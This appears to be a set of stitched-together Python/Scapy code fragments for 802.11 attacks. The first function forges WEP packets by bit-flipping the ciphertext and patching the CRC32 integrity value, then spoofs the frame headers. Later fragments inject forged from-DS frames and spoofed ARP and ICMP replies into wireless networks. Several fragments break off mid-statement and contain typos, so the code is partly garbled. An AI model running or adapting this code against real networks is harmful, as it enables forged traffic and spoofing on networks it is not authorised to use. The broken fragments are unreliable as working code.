def flip_bits(self, packet): wepdata = packet[Dot11WEP].wepdata # Skip first 4 bytes corresponding to IV and KeyID # The ICV is included in the cyphertext and corresponds to the last 4 bytes cyphertext = str(packet[Dot11WEP])[4:] flipped_packet = packet.copy() # Preserve the original wep packet # Create bitmask with same size as the encrypted wepdata, excluding the ICV bitmask = list('\x00' * len(wepdata)) # Flip bits of the bitmask corresponding to the last byte of sender MAC and IP respectively bitmask[len(wepdata) - 15] = chr(randint(0, 255)) bitmask[len(wepdata) - 11] = chr(randint(0, 255)) # Create crc32 checksum for the bitmask icv_patch = calc_crc32(bitmask) icv_patch_bytes = pack("<I", icv_patch) final_bitmask = bitmask + list(icv_patch_bytes) # Append the ICV patch to the bitmask data # Now apply the 'patch' to the wepdata and the icv by XORing the final_bitmask with the original cyphertext flipped_result = [ chr( ord(cyphertext[i]) ^ ord(final_bitmask[i]) ) for i in range(len(cyphertext)) ] final_result = str(packet[Dot11WEP])[:4] + "".join(flipped_result) # Put the results back in the packet flipped_packet[Dot11WEP] = Dot11WEP(final_result) # Now lets change the 802.11 information header to make it look like it came from a client. flipped_packet[Dot11].FCfield = "from-DS+retry+wep" flipped_packet[Dot11].addr1 = "ff:ff:ff:ff:ff:ff" flipped_packet[Dot11].addr3 = (packet[Dot11].addr2[:-2] + "%02x") % randint(0, 255) flipped_packet[Dot11].addr2 = self.ap_bssid return flipped_packet
def handle_read(self): # | 4 bytes | 4 bytes | 18 bytes | 1500 bytes | # Tap VLAN Ether Header Frame buf = self.read(1526) eth_rcvd_frame = Ether(buf[4:]) #if DEBUG: # os.write(1,"Received from %s\n" % ifname) # if VERB: # os.write(1,"%s\n" % eth_rcvd_frame.summary()) # Prepare Dot11 frame for injection dot11_sent_frame = self.radiotap() dot11_sent_frame /= Dot11(type="Data", FCfield="from-DS", addr1=eth_rcvd_frame.getlayer(Ether).dst, addr2=self._tap.bssid) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if self._tap.smac == '': dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src else: dot11_sent_frame.addr3 = self._tap.smac if self._tap.has_wep: dot11_sent_frame.FCfield |= 0x40 dot11_sent_frame /= Dot11WEP(iv="111", keyid=self._tap.key_id) dot11_sent_frame /= LLC(ctrl=3) / SNAP(code=eth_rcvd_frame.getlayer( Ether).type) / eth_rcvd_frame.getlayer(Ether).payload #if DEBUG: # os.write(1,"Sending from-DS to %s\n" % OUT_IFACE) # if VERB: # os.write(1,"%s\n" % dot11_sent_frame.summary()) # Frame injection : sendp(dot11_sent_frame, verbose=0) # Send from-DS frame
"Received ARP Request on %s\n" % options.in_iface) if optios.verb: os.write(1, "%s\n" % dot11_frame.summary()) # Building ARP Reply answer for injection dot11_answer = RadioTap() / Dot11( type="Data", FCfield="from-DS", addr1=dot11_frame.getlayer(Dot11).addr2, addr2=options.bssid) dot11_answer.addr3 = options.smac if options.wepkey is not None: dot11_answer.FCfield |= 0x40 dot11_answer /= Dot11WEP(iv="111", keyid=options.keyid) dot11_answer /= LLC(ctrl=3) / SNAP() / ARP( op="is-at", hwsrc=options.smac, psrc=dot11_frame.getlayer(ARP).pdst, hwdst=dot11_frame.getlayer(ARP).hwsrc, pdst=dot11_frame.getlayer(ARP).psrc) dot11_answer /= dot11_frame.getlayer(ARP).payload if options.debug: os.write(1, "Sending ARP Reply on %s\n" % optios.out_iface) if options.verb: os.write(1, "%s\n" % dot11_answer.summary())
# Prepare Dot11 frame for injection dot11_sent_frame = RadioTap() / Dot11( type="Data", FCfield="from-DS", addr1=eth_rcvd_frame.getlayer(Ether).dst, addr2=BSSID) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if not HAS_SMAC: dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src else: dot11_sent_frame.addr3 = SMAC if WEP: dot11_sent_frame.FCfield |= 0x40 dot11_sent_frame /= Dot11WEP(iv="111", keyid=KEYID) dot11_sent_frame /= LLC(ctrl=3) / SNAP( code=eth_rcvd_frame.getlayer( Ether).type) / eth_rcvd_frame.getlayer(Ether).payload if DEBUG: os.write(1, "Sending from-DS to %s\n" % OUT_IFACE) if VERB: os.write(1, "%s\n" % dot11_sent_frame.summary()) # Frame injection : sendp(dot11_sent_frame, verbose=0) # Send from-DS frame # Frame from WiFi network if s in r:
# Prepare Dot11 frame for injection dot11_sent_frame = RadioTap() / Dot11( type="Data", FCfield="from-DS", addr1=eth_rcvd_frame.getlayer(Ether).dst, addr2=options.bssid) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if options.smac is None: dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src else: dot11_sent_frame.addr3 = options.smac if options.wepkey is not None: dot11_sent_frame.FCfield |= 0x40 dot11_sent_frame /= Dot11WEP(iv="111", keyid=options.keyid) dot11_sent_frame /= LLC(ctrl=3) / SNAP( code=eth_rcvd_frame.getlayer( Ether).type) / eth_rcvd_frame.getlayer(Ether).payload if options.debug: os.write(1, "Sending from-DS to %s\n" % options.out_iface) if options.verb: os.write(1, "%s\n" % dot11_sent_frame.summary()) # Frame injection : sendp(dot11_sent_frame, verbose=0) # Send from-DS frame # Frame from WiFi network if s in r:
if VERB: os.write(1, "%s\n" % dot11_frame.summary()) # Building ICMP Echo Reply answer for injection dot11_answer = RadioTap() / Dot11( type="Data", FCfield="from-DS", addr1=dot11_frame.getlayer(Dot11).addr2, addr2=BSSID) if not HAS_SMAC: dot11_answer.addr3 = dot11_frame.getlayer(Dot11).addr1 else: dot11_answer.addr3 = SMAC if WEP: dot11_answer.FCfield |= 0x40 dot11_answer /= Dot11WEP(iv="111", keyid=KEYID) dot11_answer /= LLC(ctrl=3) / SNAP() / IP( src=dot11_frame.getlayer(IP).dst, dst=dot11_frame.getlayer(IP).src, ttl=TTL) dot11_answer /= ICMP(type="echo-reply", id=dot11_frame.getlayer(ICMP).id, seq=dot11_frame.getlayer(ICMP).seq) dot11_answer /= dot11_frame.getlayer(ICMP).payload if DEBUG: os.write(1, "Sending ICMP Echo Reply on %s\n" % OUT_IFACE) if VERB: os.write(1, "%s\n" % dot11_answer.summary()) # Frame injection :